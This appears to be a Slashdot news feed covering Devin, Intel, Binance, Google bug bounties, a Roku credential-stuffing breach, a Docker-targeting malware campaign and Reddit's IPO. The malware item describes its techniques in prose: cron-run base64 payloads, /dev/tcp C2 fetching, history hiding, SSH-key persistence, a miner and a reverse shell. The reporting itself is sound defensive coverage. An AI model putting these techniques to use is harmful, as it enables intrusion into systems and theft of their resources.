Longtime Slashdot reader ahbond shares a report from VentureBeat: Today, Cognition, a recently formed AI startup backed by Peter Thiel’s Founders Fund and tech industry leaders including former Twitter executive Elad Gil and Doordash co-founder Tony Xu, announced a fully autonomous AI software engineer called “Devin.” While there are multiple coding assistants out there, including the famous Github Copilot, Devin is said to stand out from the crowd with its ability to handle entire development projects end-to-end, right from writing the code and fixing the bugs associated with it to final execution. This is the first offering of this kind and even capable of handling projects on Upwork, the startup has demonstrated. […]

In a blog post today on Cognition’s website, Scott Wu, the founder and CEO of Cognition and an award-winning sports coder, explained Devin can access common developer tools, including its own shell, code editor and browser, within a sandboxed compute environment to plan and execute complex engineering tasks requiring thousands of decisions. The human user simply types a natural language prompt into Devin’s chatbot style interface, and the AI software engineer takes it from there, developing a detailed, step-by-step plan to tackle the problem. It then begins the project using its developer tools, just like how a human would use them, writing its own code, fixing issues, testing and reporting on its progress in real-time, allowing the user to keep an eye on everything as it works. […]

According to demos shared by Wu, Devin is capable of handling a range of tasks in its current form. This includes common engineering projects like deploying and improving apps/websites end-to-end and finding and fixing bugs in codebases to more complex things like setting up fine-tuning for a large language model using the link to a research repository on GitHub or learning how to use unfamiliar technologies. In one case, it learned from a blog post how to run the code to produce images with concealed messages. Meanwhile, in another, it handled an Upwork project to run a computer vision model by writing and debugging the code for it. In the SWE-bench test, which challenges AI assistants with GitHub issues from real-world open-source projects, the AI software engineer was able to correctly resolve 13.86% of the cases end-to-end — without any assistance from humans. In comparison, Claude 2 could resolve just 4.80% while SWE-Llama-13b and GPT-4 could handle 3.97% and 1.74% of the issues, respectively. All these models even required assistance, where they were told which file had to be fixed. Currently, Devin is available only to a select few customers. Bloomberg journalist Ashlee Vance wrote a piece about his experience using it here.

“The Doom of Man is at hand,” captions Slashdot reader ahbond. “It will start with the low-hanging Jira tickets, and in a year or two, able to handle 99% of them. In the short term, software engineers may become like bot farmers, herding 10-1000 bots writing code, etc. Welcome to the future.”

Read more of this story at Slashdot.

According to a new study from the Institute for the Future of Work, contemporary technology often has a negative impact on workers’ quality of life. The think tank surveyed over 6,000 people to learn how four categories of workplace technologies affected their wellbeing. TechSpot reports the findings: The study found that increased exposure to three of the categories tended to worsen workers’ mental state and health. The three areas that negatively impact people most are wearable and remote sensing technologies, which covers CCTV cameras and wearable trackers; robotics, consisting of automated machines, self-driving vehicles, and other equipment; and, unsurprisingly, technologies relating to AI and ML, which includes everything from decision management to biometrics. Only one of the categories was found to be beneficial to employees, and it’s one that has been around for decades: ICT tech such as laptops, tablets, phones, and real-time messaging tools.

Read more of this story at Slashdot.

According to Bloomberg (paywalled), the Pentagon has reportedly scrapped its plan to allocate $2.5 billion in grants to Intel, causing the firm’s stock to slip in extended-hours trading. From a report: The decision now leaves the U.S. Commerce Department, which is responsible for doling out the funds from the U.S. CHIPs and Science Act, to make up the shortfall, the news outlet said. The Commerce Dept. was initially only supposed to cover $1B of the $3.5B that Intel is slated to receive for advanced defense and intelligence-related semiconductors. The deal is slated to position Intel as the dedicated supplier for processors used for military and intelligence applications and could result in a Secure Enclave inside Intel’s chip factory, the news outlet said. With the Pentagon reportedly pulling out, it could alter how much Intel and other companies receive from the CHIPs Act, the news outlet said.

Read more of this story at Slashdot.

Two top executives from the crypto exchange Binance have been arrested in Nigeria for allegedly destabilizing the national currency. Quartz reports: According to a Wall Street Journal report, Tigran Gambaryan, head of financial-crime compliance at Binance who previously worked at the U.S. Internal Revenue Service (IRS), and Nadeem Anjarwalla, a British-Kenyan national and Binance’s regional manager for Africa, have been held against their will for the past two weeks in the country. As per reports, Nigerian government officials invited Binance executives to discuss an ongoing dispute about the world’s largest crypto exchange allegedly driving down the value of their national currency. Gambaryan and Anjarwalla arrived in Nigeria on February 25th; after their meeting with government officials, both were taken to their hotels. Later, they were instructed to pack their belongings and move to a guesthouse run by Nigeria’s National Security Agency, as stated by their families, per reports.

The Nigerian government has accused Binance of exacerbating the country’s foreign exchange challenges through rate manipulation for profit. The authorities have also accused the crypto exchange of illegal operations and have restricted access to the company’s website. There are also reports that Nigeria sought a $10 billion penalty from Binance for processing around $26 billion in untraceable funds in the country. […] The reason why and how Nigeria’s economic crisis is linked with Binance is yet to be found out. Binance is hoping to resolve the matter soon, according to CoinDesk. The report notes that Nigeria is experiencing its worst economic crisis in recent years due to inflation and the devaluation of their currency, the naira.

Read more of this story at Slashdot.

Bill Toulas reports via BleepingComputer: Google awarded $10 million to 632 researchers from 68 countries in 2023 for finding and responsibly reporting security flaws in the company’s products and services. Though this is lower than the $12 million Google’s Vulnerability Reward Program paid to researchers in 2022, the amount is still significant, showcasing a high level of community participation in Google’s security efforts.

The highest reward for a vulnerability report in 2023 was $113,337, while the total tally since the program’s launch in 2010 has reached $59 million. For Android, the world’s most popular and widely used mobile operating system, the program awarded over $3.4 million. Google also increased the maximum reward amount for critical vulnerabilities concerning Android to $15,000, driving increased community reports. During security conferences like ESCAL8 and hardwea.io, Google awarded $70,000 for 20 critical discoveries in Wear OS and Android Automotive OS and another $116,000 for 50 reports concerning issues in Nest, Fitbit, and Wearables. Google’s other big software project, the Chrome browser, was the subject of 359 security bug reports that paid out a total of $2.1 million.

Read more of this story at Slashdot.

According to the Wall Street Journal (paywalled), former Activision CEO Bobby Kotick is reportedly considering buying TikTok. PCMag reports: Kotick floated the idea at a dinner at an Allen & Co. conference earlier this week with a group of potential partners, including OpenAI CEO Sam Altman, the Journal says. Kotick left Activision in late December after more than 30 years following the approval of the Microsoft merger and a tumultuous period that included a damaging discrimination lawsuit. And while he got a hefty golden parachute, it’s probably not enough to buy TikTok, so he’ll need partners with deep pockets. The report comes amid a vote in the House that would require TikTok to be sold or banned in the United States.

Read more of this story at Slashdot.

Over 15,000 Roku customers were hacked and used to make fraudulent purchases of hardware and streaming subscriptions. According to BleepingComputer, the threat actors were “selling the stolen accounts for as little as $0.50 per account, allowing purchasers to use stored credit cards to make illegal purchases.” From the report: On Friday, Roku first disclosed the data breach, warning that 15,363 customer accounts were hacked in a credential stuffing attack. A credential stuffing attack is when threat actors collect credentials exposed in data breaches and then attempt to use them to log in to other sites, in this case, Roku.com. The company says that once an account was breached, it allowed threat actors to change the information on the account, including passwords, email addresses, and shipping addresses. This effectively locked a user out of the account, allowing the threat actors to make purchases using stored credit card information without the legitimate account holder receiving order confirmation emails.

“It appears likely that the same username/password combinations had been used as login information for such third-party services as well as certain individual Roku accounts,” reads the data breach notice. “As a result, unauthorized actors were able to obtain login information from third-party sources and then use it to access certain individual Roku accounts. “After gaining access, they then changed the Roku login information for the affected individual Roku accounts, and, in a limited number of cases, attempted to purchase streaming subscriptions.” Roku says that it secured the impacted accounts and forced a password reset upon detecting the incident. Additionally, the platform’s security team investigated for any charges due to unauthorized purchases performed by the hackers and took steps to cancel the relevant subscriptions and refund the account holders.

A researcher told BleepingComputer last week that the threat actors have been using a Roku config to perform credential stuffing attacks for months, bypassing brute force attack protections and captchas by using specific URLs and rotating through lists of proxy servers. Successfully hacked accounts are then sold on stolen account marketplaces for as little as 50 cents, as seen below where 439 accounts are being sold. The seller of these accounts provides information on how to change information on the account to make fraudulent purchases. Those who purchase the stolen accounts hijack them with their own information and use stored credit cards to purchase cameras, remotes, soundbars, light strips, and streaming boxes. After making their purchases, it is common for them to share screenshots of redacted order confirmation emails on Telegram channels associated with the stolen account marketplaces.

Read more of this story at Slashdot.

Surgeons in the United Kingdom have performed the first operation in the country using Apple’s Vision Pro headset. TechSpot reports: During a recent operation to repair a patient’s spine at the private Cromwell Hospital in London, a scrub nurse working alongside the surgeon used the Vision Pro to help prepare, keep track of the procedure, and choose the right tools, reports the Daily Mail. This marked the first operation in the UK where the Vision Pro was used. The software running on Apple’s headset during the operation comes from US company eXeX, which has made similar programs for Microsoft’s HoloLens. It offers nurses and technicians both holographic and touch-free access to the surgical setup and the procedural guides from within the sterile field of the operating room, according to the press release. The software also tracks each stage of an operation and can measure how well the op went compared to previous procedures performed by other surgeons.

“It eliminates human error and eliminates the guesswork,” said Suvi Verho, lead scrub nurse at London Independent Hospital. “It gives you confidence in surgery.” While this marked the first time that the Vision Pro was used during a UK surgery, the first-ever time the device was used in an operating room was last month, just three days after its release, when Orlando resident and world-renowned Neurosurgeon Dr. Robert Masson wore it during several spine reconstruction surgeries. “We are in a new era of surgery, and for the first time, our surgical teams have the brilliance of visual holographic guidance and maps, improving visuospatial and temporal orientation for each surgical team and for each surgery in all specialties,” said Masson.

Read more of this story at Slashdot.

Researchers at Cado Security Labs received an alert about a honeypot using the Docker Engine API. “A Docker command was received…” they write, “that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server’s root directory…”
Typically, this is exploited to write out a job for the Cron scheduler to execute… In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker’s Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server… To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh

“Multiple user mode rootkits are deployed to hide malicious processes,” they note. And one of the shell scripts “makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker’s session from being appended to the history file… Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn’t appear in the shell history once a new session has been spawned.”

The same script also inserts “an attacker-controlled SSH key to maintain access to the compromised host,” according to the article, retrieves a miner for the Monero cryptocurrency and then “registers persistence in the form of systemd services” for both the miner and an open source Golang reverse shell utility named Platypus.

It also delivers “various utilities,” according to the blog Security Week, “including ‘masscan’ for host discovery.” Citing CADO’s researchers, they write that the shell script also “weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents.”
The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet… [“For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host,” the researchers writes.]

“This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers,” Cado notes. “It’s clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments.”

Read more of this story at Slashdot.

An article in Inc notes a “wild projection” in Reddit’s SEC filing that Reddit’s global market opportunity by 2027 is $1.4 trillion.”
Some of the numbers lead back to a single individual: Sam Altman. The co-founder and chief executive of ChatGPT-maker OpenAI owns an 8.7 percent stake in Reddit, more than its co-founder and CEO, Steve Huffman, who owns 3.3 percent… Altman, through various funds and holding companies he owns or manages, controls more than a million shares of Reddit at $60 million in aggregate purchase price — and holds more than 9 percent of voting rights…
Discussing Reddit’s future, financial analyst and journalist Herb Greenberg recently told CNBC, “This is an AI play.”

But the senior investing editor for Kiplinger.com argues that retail investors “may want to hold tight before rushing out to buy the Reddit IPO.”
While IPO stocks tend to have strong first-day showings, returns for the first year are generally weak, says the team of analysts at Trivariate Research, a market research firm based in New York. And since 2020, “the average IPO has lagged its industry average by 30% over the subsequent three years following its first closing price…”

Other commenters have noted that Reddit’s allotment of shares to select Redditors could lower demand on the first day of trading, which would work against any IPO pop.

“Over the past few years, there have been a bunch of IPOs in the U.S. in which overhyped names enjoyed flashy stock-market debuts only to drop sharply soon after,” notes the Street.
Notable examples include Coinbase, which plummeted by almost 90% after its debut, Robinhood, still down 53% since its IPO, and Rivian, down over 91% since its debut. However, it’s crucial to note that all of these IPOs occurred in 2021 amid market euphoria fueled by low interest rates, significant economic stimulus, and the lingering effects of the Covid-19 pandemic. Although the current macroeconomic landscape differs from three years ago, valuations of tech and growth stocks remain stretched.

Kiplingers.com concludes it “boils down to your own personal investing goals and risk tolerance. If you do decide to buy Reddit stock when it first begins trading, do so in a small amount that you can afford to lose.”

But they also cite analysis from David Trainer, CEO of New Constructs, a research firm powered by artificial intelligence. “Reddit’s IPO marks the return of the junk IPO,” Trainer wrote in Forbes. “[The valuation] implies that Reddit will grow its user base to 26 times current levels, which would be nearly five times the size of [Snapchat-maker] Snap, and a highly unlikely feat. Reddit looks overvalued, and we think investors should pass on this IPO.”
Trainer writes:
[T]he company has never been profitable and should not be a publicly traded company… I think the company may never monetize its platform without angering its users and the entire premise of Reddit is user-generated content. This business model is inescapably built on a catch-22: make money or please users… Reddit looks overvalued, and I think investors should pass on this IPO.

Buyers and analysts told the site Marketing Brew “that they see the platform as nice-to-have, but that it is not an essential part of their media plans, like Meta or Google are.”

“They’ve always been solidly in the second or third tier of social networks,” alongside Snap, Pinterest, and X, Brian Wieser, a former GroupM exec who’s now author of the industry newsletter Madison and Wall, told Marketing Brew.

Yet Trainer notes that “98% of Reddit’s revenue in 2023 came from third-party advertising on the site and 28% of all revenue came from ten customers,” and “Reddit’s cost of revenue, sales & marketing, general & administrative, and research & development costs were 117% of revenue in 2023.”

Trainer concludes “Reddit is nowhere near breakeven. Reddit is an unprofitable social media company fighting for users.”

Bloomberg adds that the subreddit r/WallStreetBets “has threatened to bet against the stock, with many people noting that the company still loses money two decades into its existence. (Reddit lost $90.8 million last year, down from $158.6 million the year before.)”

Some have complained that the invitation to invest fails to make up for the unpaid labor they’ve invested making the site work… In 2021 the platform’s WallStreetBets forum ignited a meme-stock frenzy, propelling skyward the stocks of nostalgic but struggling companies like GameStop Corp. and AMC Entertainment Holdings Inc. and sending shockwaves through the financial industry… When it goes public, the platform that invented meme stocks runs the risk of becoming one itself.

Reddit noted the possibility as a risk in its IPO filing. “Given the broad awareness and brand recognition of Reddit, including as a result of the popularity of r/wallstreetbets among retail investors,” the company warned that its stock could “experience extreme volatility … which could cause you to lose all or part of your investment if you are unable to sell your shares at or above the initial offering price.”
Users on WallStreetBets got a kick out of the fact that the company listed the forum as a risk factor, posting about it with a sly smiling emoji…

Meanwhile, reports that marketers are infiltrating subreddits have been confirmed. Over 200 businesses have “integrated Reddit Pro into their digital strategies,” reports Search Engine Land, including “well-known names such as Taco Bell, the NFL, and The Wall Street Journal…
“During the initial alpha testing phase with approximately 20 businesses, Reddit reported its Pro partners, on average, generated 11 additional posts and comments per month.”

Read more of this story at Slashdot.